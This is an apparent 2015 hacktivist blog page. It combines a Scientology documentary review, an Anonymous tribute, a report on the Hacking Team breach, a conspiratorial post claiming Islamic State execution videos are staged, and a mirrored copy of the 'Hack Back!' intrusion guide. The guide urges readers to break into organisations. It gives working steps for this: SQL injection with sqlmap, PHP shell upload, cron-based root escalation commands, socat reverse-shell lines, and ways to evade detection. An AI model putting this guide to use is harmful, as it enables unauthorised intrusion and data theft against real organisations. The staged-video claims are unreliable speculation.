Thursday, July 16, 2015

Documentary "Going Clear: Scientology and the Prison of Belief" by Alex Gibney (2015 HBO)

Documentary "Going Clear: Scientology and the Prison of Belief" by Alex Gibney subtitled in Castilian (2015 HBO)

By Petete "Argie" Anon Anonymous Argentina

Documentary "Going Clear: Scientology and the Prison of Belief" by Alex Gibney subtitled in Castilian (2015 HBO)
Click on the link above to see it on Youtube (and that the insertion sites is disabled on the video source)
or try this one

We are pleased to see someone beat us to present this documentary online brand produced by HBO with subtitles in Castilian. Anyway we are working on our own version, should disappear from Youtube.

This is the documentary about the cult "Church of Scientology" (Scientology) the talented Alex Gibney (responsible inter alia documentary about Wikileaks and its founder Armand Assange, child abuse in the Catholic Church and the collapse of the Enron Corporation) . It premiered in a select number of theaters on March 13, 2015 and aired on HBO on March 29, 2015. It was an absolute success rating by mid April and had seen half people 5 million, becoming the second most watched HBO documentary of the decade.

The documentary is based on the book by award-winning journalist Lawrence Wright as it covers from the beginnings of L. Ron Hubbard to present Scientology David Miscavige, with an excellent level of detail in the research, in addition to the testimonies many ex-cult members, journalists and specialists on the subject.

Consider in detail the beginnings of Hubbard in black magic, his psychiatric problems and family, and touch issues like dirty operations so characteristic of the sect as "Operation Freakout" -destinada going crazy and imprison the journalist Paulette Cooper in retaliation for written the book "The Scandal of Scientology" - concentration camps Scientology FBI infiltration, the victory of the sect against the IRS, current recruitment campaigns and fund-intensive funds, and we prefer to leave much appreciated instead of giving an innumerable list.

But it should be mentioned some things that they especially like us, like the story of the relationship between Sylvia "Spanky" Taylor and actor John Travolta Scientology member. "Spanky" Taylor was who attended Travolta within the sect after his acting success, and although it was the guide of the actor within the sect, someone Travolta came to depend more than his agent, from one day to another without explanation the sect wiped out "Spanky" Travolta's life by sending one of their camps. Later, they asked him to organize a special role in the cult of "Fever Saturday Night" (Saturday Night Fever) with the presence of Travolta, who never knew the reason for the disappearance of "Spanky" of his life, and when it was organized, they were not allowed to attend, sending it back to camp. Although Travolta came to know details of the suffering of "Spanky" in Scientology he never spoke about it and remains a member of the sect even after having lost a child due to lack of treatment because of their beliefs and practices; however Travolta's sister was a key figure that allowed "Spanky" after escaping from Scientology.

Another wonderful detail inédita- documentary is now up to the inclusion of an audio fragment obtained the filming of the documentary The Shrinking World of L. Ron Hubbard "where the founder of Scientology, L. Ron Hubbard, Scientology abuses within admits. This fragment was recorded off camera, while the cameras were rolling as the interview of the "World in Action" program was being prepared, and although it was not included in the original program, the director Alex Gibney won it after contact with journalist who interviewed Hubbard, who was the first and only journalist (outside the sect) to obtain an interview with the sectarian guru.

Also very interesting the part where it talks about how Scientology handled by decades the life of Tom Cruise, away from his then-wife Nicole Kidman, pulling the cult leader David Miscavige, getting girlfriends, etc.

Finally we highlight the performance in this documentary of a new audiovisual interpretation of the story of Xenu, the intergalactic emperor who believe in those who reach the highest levels of Scientology (OT3), which they deny this but too many tests by records obtained in trials of former members who leaked secrets and journalistic investigations levels.

It is by far one of the best documentaries about Scientology, undoubtedly. And as expected, even before its release, the sect "Iglesiia of Scientology" (Scientology) launched its so characteristic campaigns black propaganda and defamation against the director Alex Gibney, producers, former members and journalists who spoke in the documentary, the network that produced and issued (HBO), and to put pressure on critics who praised it.

The funny and pathetic, in addition to the campaign itself, it was that she used materials from previous campaigns attack on ex-cult members and journalists who had made media sites that allegedly did not belong to them, or so declared them, though everyone to see the obvious. It seems that in desperation to discredit all those involved in the making of this documentary Scientology did not realize he was bringing out using as their own material that had previously refused out by them or belonged to them.

They say that the lie has short legs, and there is no evil that lasts forever ...

In short, an excellent documentary that we strongly recommend.
Published by Petete "Argie" Anon in 5:18 a.m.

tags: : Alex Gibney, david miscavige, documentales, Going Clear, HBO, IGLESIA DE SCIENTOLOGY, john travolta, l. ron hubbard, Lawrence Wright, Marty Rathbun, mike rinder, paul haggis, scientology, Tom Cruise

Orignal Post= in spanish

Monday, July 13, 2015

#FreeAken #FreeOtherwise

#FreeAken #FreeOtherwise

When an Anon is arrested his identity is revealed as a death. But stronger than death is love .
Our beloved companions are with us, in our hearts. No arrests will take you from us.
Otherwise and Aken, they were and are true anons who fought for the ideal knowing the
consequences they would pay.
All legion feels your loss and we will not allow your efforts to be in vain.  There will be revenge for you, brothers.
Finally we want to thank you for everything you have done for us and for the time spent together .
We will never forget you.
We are Anonymous
We are a Legion
We do not forgive
We do not forget
Expect us

Hacking Team Hacked: 400GB Data Dump of Internal Documents/Emails/Source Code from Notorious Spyware Dealer

Hacking Team Hacked: 400GB Data Dump of Internal Documents/Emails/Source Code from Notorious Spyware Dealer

on July 7, 2015 at 9:07 AM
The controversial Italian surveillance company Hacking Team, which sells spyware to governments all around the world, including agencies in Ethiopia, Morocco, the United Arab Emirates, as well as the US Drug Enforcement Administration, has been seriously hacked.
Hackers have made 400GB of client files, contracts, financial documents, and internal emails, some as recent as 2015, publicly available for download.
What’s more, the unknown hackers announced their feat through Hacking Team’s own Twitter account.
Last year, a hacker who only went by the name “PhineasFisher” hacked the controversial surveillance tech company Gamma International, a British-German surveillance company that sells the spyware software FinFisher. He then went on to leak more than 40GB of internal data from the company, which has been long criticized for selling to repressive governments.

That same hacker has now claimed responsibility for the breach of Hacking Team, that sells a similar product called Remote Controlled System Galileo.

Lorenzo Franceschi-Bicchierai/Motherboard:
On Sunday night, I reached out to the hacker while he was in control of Hacking Team’s Twitter account via a direct message to @hackingteam. Initially, PhineasFisher responded with sarcasm, saying he was willing to chat because “we got such good publicity from your last story!” referring to a recent story I wrote about the company’s CEO claiming to be able to crack the dark web.
Afterwards, however, he also claimed that he was PhineasFisher. To prove it, he told me he would use the parody account he used last year to promote the FinFisher hack to claim responsibility.
“I am the same person behind that hack,” he told me before coming out publicly.
The hacker, however, declined to answer to any further questions.
The leak of 400GB of internal files contains “everything,” according to a person close to the company, who only spoke on condition of anonymity. The files contain internal emails between employees; a list of customers, including some, such as the FBI, that were previously unknown; and allegedly even the source code of Hacking Team’s software, its crown jewels.

Screenshot shows an email dated 2014 from Hacking Team’s founder and CEO David Vincenzetti to another employee. In the email, titled “Yet another Citizen Lab attack,” Vincenzetti links to a report from the online digital rights research center Citizen Lab, at the University of Toronto’s Munk School of Global Affairs, which has exposed numerous cases of abuse from Hacking Team’s clients.
Hacking Team has never revealed a list of its clients, and has always and repeatedly denied selling to sketchy governments, arguing that it has an internal procedure to address human rights concerns about prospective customers.
The email about Citizen Lab is filed in a folder called “Anti HT activists.”
via Thomas Fox-Brewster/Forbes:
In-depth notes on the level of exploitation across a number of Android devices, from the likes of Samsung, HTC and Huawei. It appears the exploits weren’t always successful in accessing voice or texts on phones.
Hacking Team operations manager Daniele Milan’s email from January indicated some imminent features in Hacking Team’s tools included “physical infection of BitLocker protected disks”, thereby bypassing the much-used Microsoft disk encryption technology, as well as “extraction of information from pictures posted on Facebook and Twitter”. It will also soon be able to “capture of documents edited using Google Docs or Office 365”, the roadmap suggested.
Another email from Milan, dated 15 May, indicated the security-focused messaging application Wickr was on the target list too, thanks to a request from the US government. “I had a call this morning with an agent from Homeland Security Investigations [a body within the Department of Homeland Security], and he told me he got some requests to intercept suspects using this application, Wickr… we may want to keep an eye on it and eventually evaluate to add support.”
via Dan Goodin/ArsTechnica:
Another document boasts of Hacking Team’s ability to bypass certificate pinning and the HTTP strict transport security mechanisms that are designed to make HTTPS website encryption more reliable and secure. “Our solution is the only way to intercept TOR traffic at the moment,” the undated PowerPoint presentation went on to say.
Elsewhere, the document stated: “HTTPS Everywhere enforces https and could send rogue certificates to the EFF SSL Observatory.” HTTPS Everywhere is a browser extension developed by the Electronic Frontier Foundation that ensures end users use HTTPS when connecting to a preset list of websites. The statement appears to be a warning that any fraudulent certificates Galileo relies on could become public if used against HTTPS Everywhere users when they have selected an option to send anonymous copies of HTTPS certificates to EFF’s SSL Observatory database.
Renowned cryptographer Bruce Schneier: “The Hacking Team CEO, David Vincenzetti, doesn’t like me:”
In another [e-mail], the Hacking Team CEO on 15 May claimed renowned cryptographer Bruce Schneier was “exploiting the Big Brother is Watching You FUD (Fear, Uncertainty and Doubt) phenomenon in order to sell his books, write quite self-promoting essays, give interviews, do consulting etc. and earn his hefty money.”
Lorenzo Franceschi-Bicchierai/Motherboard:
After suffering a massive hack, the controversial surveillance tech company Hacking Team is scrambling to limit the damage as well as trying to figure out exactly how the attackers hacked their systems.
But the hack hasn’t just ruined the day for Hacking Team’s employees. The company has told all its customers to shut down all operations and suspend all use of the company’s spyware, Motherboard has learned.
“They’re in full on emergency mode,” a source who has inside knowledge of Hacking Team’s operations told Motherboard.
Hacking Team notified all its customers on Monday morning with a “blast email,” requesting them to shut down all deployments of its Remote Control System software, also known as Galileo, according to multiple sources. The company also doesn’t have access to its email system as of Monday afternoon, a source said.
A source told Motherboard that the hackers appears to have gotten “everything,” likely more than what the hacker has posted online, perhaps more than one terabyte of data.
It’s unclear how the hackers got their hands on the stash, but judging from the leaked files, they broke into the computers of Hacking Team’s two systems administrators, Christian Pozzi and Mauro Romeo, who had access to all the company’s files, according to the source.
In a series of tweets on Monday morning, which have been since deleted, Pozzi said that Hacking Team was working closely with the police, and warned everyone who was downloading the files and commenting on them.
“Be warned that the torrent file the attackers claim is clean has a virus,” he wrote. “Stop seeding and spreading false info.”
The future of the company, at this point, it’s uncertain.
Employees fear this might be the beginning of the end, according to sources. One current employee, for example, started working on his resume, a source told Motherboard.
It’s also unclear how customers will react to this, but a source said that it’s likely that customers from countries such as the US will pull the plug on their contracts.
Hacking Team asked its customers to shut down operations, but according to one of the leaked files, as part of Hacking Team’s “crisis procedure,” it could have killed their operations remotely.
The company, in fact, has “a backdoor” into every customer’s software, giving it ability to suspend it or shut it down—something that even customers aren’t told about.
To make matters worse, every copy of Hacking Team’s Galileo software is watermarked, according to the source, which means Hacking Team, and now everyone with access to this data dump, can find out who operates it and who they’re targeting with it.
Hacking Team did not answer to repeated requests for comment, both to its US spokesperson Eric Rabe as well as directly to its office in Milan, Italy.
When asked about the identity of the person or group who carried out the attack, Rabe indicated that he believed the attack was the work of a nation state or a criminal gang, and not the work of an activist as many have speculated:
“Doing our own forensics here, we think this was a very sophisticated attack, and certainly not the work of an amateur. The press seems to take the view that this was some sort of human rights activist but I think that is far from certain and it could easily have been criminal activity or some government activity,” adding that “this is almost certainly an international crime”.
When it was pointed out that if a government or criminal group was behind the attack then posting all the information online seems a strange move, Rabe said: “I am not sure why anybody would do that, but part of the effort here was to disrupt our operations as much as possible so I think that would be a motive for many different people.”
When asked if this could be the work of one of Hacking Team’s competitors such as UK-based Gamma International or Israeli NSO Group, Rabe said: “I think that is unlikely” though he admitted that just like everyone else he was speculating.
While some media reports have suggested the company is working with the Italian police to investigate the attack, Rabe says that all he will say is that the company is “working with law enforcement” reiterating that this was an international attack.
*This post will be continuously updated as there is much more new information emerging. Post anything you find in the comments below and I will add them to the article. LAST UPDATE: 07/09/2015 @ 5PM EST

Related Links:
To Protect and Infect: The Militarization of the Internet – Claudio Guarnieri, Morgan Marquis-Boire, Jacob Appelbaum @ 30c3

Leaked Video Shows Making of Islamic State “Execution” in Studio — via CyberBerkut Hack of Sen. McCain Staffer

Leaked Video Shows Making of Islamic State “Execution” in Studio — via CyberBerkut Hack of Sen. McCain Staffer

 on July 12, 2015 at 2:56 PM
CyberBerkut (Google Translation):
We CyberBerkut received at the disposal of the file whose value can not be overstated!
Dear Senator McCain! We recommend you next time in foreign travel, and especially on the territory of Ukraine, not to take confidential documents.
On one of the devices of your colleagues, we found a lot of interesting things. Something we decided to put: this video should become the property of the international community!
The 3 ½ minute silent video appears to show infamous Islamic State executioner Jihadi John (aka Mohammed Emwazi) in front of a giant green screen, standing beside a kneeling hostage wearing an orange jumpsuit and a green screen hood. They are inside a lit studio with a production crew and can be seen rehearsing an “execution”. The desert scene of the set, complete with wind machine, are similar to that shown in the beheading videos of James Foley, Steven Sotloff, David Haines, and Alan Henning.

Here is an example someone put together showing the similarities between the leaked studio video and the Foley beheading video. Though they are not identical, it gives a good comparison:
British forensic experts concluded that the James Foley video was likely staged using “camera trickery and slick post-production techniques.”

Terrorism research expert Veryan Khan said the video of Japanese hostages Kenji Goto and Haruna Yukawa was likely completed in an indoor studio with a false backdrop.

Hollywood horror film director Mary Lambert said of the Islamic State video showing the killing of 21 Egyptian Coptic Christians on a Libyan beach, that “in the opening shot all the figures might be animated. They never had more than six men on the beach … The close-ups of jihadists on the beach are most likely green screen … The sea turning red is obviously FX.”

Journalist Thomas Wictor has claimed that the Islamic State video showing Jordanian pilot Mu’ath al-Kaseasbeh burned alive was actually fake, pointing to evidence of CGI flames and video glitches.
LeakSource cannot confirm the video’s authenticity. If it’s a hoax, it’s a pretty elaborate one. Is it legit? If so, was it done by an Islamic State production crew (unlikely with a female PA on set) , or someone else (ie. intelligence agency). And why was it found on a device of Senator John McCain’s staffer?
Steve Watson/PrisonPlanet (05/25/2010) & Mikael Thalen/Infowars (09/03/2014):
A 2010 Washington Post article authored by former Army Intelligence Officer Jeff Stein features a detailed account of how the CIA admittedly filmed a fake Bin Laden video during the run up to the 2003 Iraq war.

The article, which includes comments from multiple sources within the CIA’s Iraq Operations Group, explains how the agency had planned to “flood Iraq with the videos” depicting several controversial scenarios.

“The agency actually did make a video purporting to show Osama bin Laden and his cronies sitting around a campfire swigging bottles of liquor and savoring their conquests with boys, one of the former CIA officers recalled, chuckling at the memory,” the article states. “The actors were drawn from ‘some of us darker-skinned employees.’”

Other CIA officials admitted to planning several fake videos featuring former Iraqi President Saddam Hussein, one of which would depict the leader engaged in sexual acts with a teenage boy.
“It would look like it was taken by a hidden camera,” said one of the former officials. “Very grainy, like it was a secret videotaping of a sex session.”

Another idea was to interrupt Iraqi television programming with a fake special news bulletin. An actor playing Hussein would announce that he was stepping down in favor of his (much-reviled) son Uday.

“I’m sure you will throw your support behind His Excellency Uday,” the fake Hussein would intone.
According to one official, the video ideas were eventually scrapped due to the CIA officers, who spent their careers in Latin America and East Asia, not understanding “the cultural nuances of the region.”

The former officials told Stein that the project was taken over by the military after it ground to a halt:
The reality, the former officials said, was that the agency really didn’t have enough money and expertise to carry out the projects.

“The military took them over,” said one. “They had assets in psy-war down at Ft. Bragg,” at the army’s special warfare center.

This latest revelation bolsters evidence that the intelligence agencies, and perhaps more significantly, the military have been engaged in creating fake Bin Laden videos in the past.
As we have exhaustively documented, Intelcenter, the U.S. monitoring group that routinely releases Bin Laden video and audio, much of which have been proven to be either rehashed old footage or outright fakes, is an offshoot of IDEFENSE, a web security company that monitors intelligence from the middle east.

IDEFENSE is heavily populated by long serving ex military intelligence officials, such as senior military psy-op intelligence officer Jim Melnick, who served 16 years in the US army and the Defense Intelligence Agency (DIA) in psychological operations. Melnick has also worked directly for former Defense Secretary Donald Rumsfeld.

Intelcenter notoriously released the “laughing hijackers” tape and claimed it was an Al-Qaeda video, despite the fact that the footage was obtained by a “security agency” at a 2000 Bin Laden speech.
IntelCenter was also caught adding its logo to a tape at the same time as Al-Qaeda’s so-called media arm As-Sahab added its logo, proving the two organizations were one and the same.

Could the CIA group of “dark skinned actors” have been behind the infamous December 2001 “Fat nosed” Bin Laden video, that was magically found in a house in Jalalabad after anti-Taliban forces moved in?

The tape featured a fat Osama laughing and joking about how he’d carried out 9/11. The video was also mistranslated in order to manipulate viewer opinion and featured “Bin Laden” praising two of the hijackers, only he got their names wrong. This Osama also used the wrong hand to write with and wore gold rings, a practice totally in opposition to the Muslim faith.

Despite the fact that the man in the video looks nothing like Bin Laden, the CIA stood by it and declared it to be the official “9/11 confession video”.

The latest revelations also shed light on another past Bin Laden release – a tape in which he ludicrously declared himself in league with Saddam Hussein in the weeks before the invasion of Iraq.
The notion that the CIA project was taken over and drastically improved by the Pentagon at some point after 2003 jives with the improvement in quality of Bin Laden videos in later years. Most notably the video that was released immediately ahead of the 2004 election, and it’s digitally manipulated duplicate from 2007, in which Bin Laden appeared to have a dyed beard.
John McCain’s last visit to Ukraine was June 19th, 2015. If this is when the hack occurred is unclear. He was also accompanied by Senators Tom Cotton and John Barrasso. They were welcomed by U.S. Ambassador to Ukraine Geoffrey Pyatt, and met with senior Ukrainian officials, including President Petro Poroshenko, after visiting troops and volunteers working on the front line. Since McCain is referenced by CyberBerkut, it is most likely that one of his staffers was hacked and not the other senators. Someone needs to FOIA which staffers accompanied McCain on his trip and if any have lost their jobs unceremoniously.
*LeakSource has requested a comment directly from CyberBerkut to confirm the hack and provide more information. This post will be updated with their response when it becomes available along with any other details as they emerge.

Hack Back! A DIY Guide for Those Without the Patience to Wait for Whistleblowers

Hack Back! A DIY Guide for Those Without the Patience to Wait for Whistleblowers

In ArchiveGammaHackingInternet on August 9, 2014 at 4:55 PM
via GammaGroupPR *Mirrored on LeakSource in case it ever disappears from Pastebin. Also included PDFs for all recommended books.
          _   _            _      ____             _    _ 
         | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
         | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
         |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
         |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

A DIY Guide for Those Without the Patience to Wait for Whistleblowers

–[ 1 ]– Introduction
I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.

–[ 2 ]– Staying Safe
This is illegal, so you’ll need to take same basic precautions:
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy

As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.

–[ 3 ]– Mapping out the target
Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.

For an example let’s take Blackwater. We start out knowing their homepage is at Running -dns we find the subdomains:

Now we do whois lookups and find the homepage of is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: –
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd

Doing a whois lookup on reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools

Now run -range on the IP ranges you find to lookup dns names, and -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.
Also just google the organization and browse around its websites. For example on we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:

If you repeat the whois lookups and such you’ll find seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable
was simply a whois lookup of which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds, which redirects to
…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

–[ 4 ]– Scanning & Exploiting
Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.
Now for each service you find running:
1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.
2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
default password.

3) Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:
1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like or you’ll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:
5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.
6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.


For the process was:
* Start nikto running in the background.
* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.
* See if WhatWeb knows anything about what software the site is running.
* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:

* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”

But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:
* google allinurl:”Scripts/scripts.js.php” and find the other sites
* Notice they’re all sql injectable in the first url parameter I try.
* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
the option –tamper=’tamper/’
* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website’s source code.


Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
javascript, and if you’re unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.


Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to: and 1=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap –file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!
–[ 5 ]– (fail at) Escalating
< got r00t? >
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].


finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer
so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ….nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.

–[ 6 ]– Pivoting
The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.
The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.

–[ 7 ]– Have Fun
Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.

Point your GPUs at and crack the password
already so I can move on to step 2! (Torrent)

–[ 8 ]– Other Methods
The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:
1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.

This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.

The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
hacker [0].


–[ 9 ]– Resources

(all his other blog posts are great too) (start at Exploit writing tutorial part 1)
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.

Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.

The Web Application Hacker’s Handbook (PDF/13.5MB)
Hacking: The Art of Exploitation (PDF/4MB)
The Database Hacker’s Handbook (PDF/2MB)
The Art of Software Security Assessment (PDF/12.6MB)
A Bug Hunter’s Diary (PDF/5.15MB)
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier (PDF/1.2MB)
* TCP/IP Illustrated – Vol. 1 (PDF/40.2MB) Vol. 2 (PDF/37.9MB) Vol. 3 (PDF/40MB)
Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

–[ 10 ]– Outro
You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

Related Link: Recommendations for the Hacktivist Community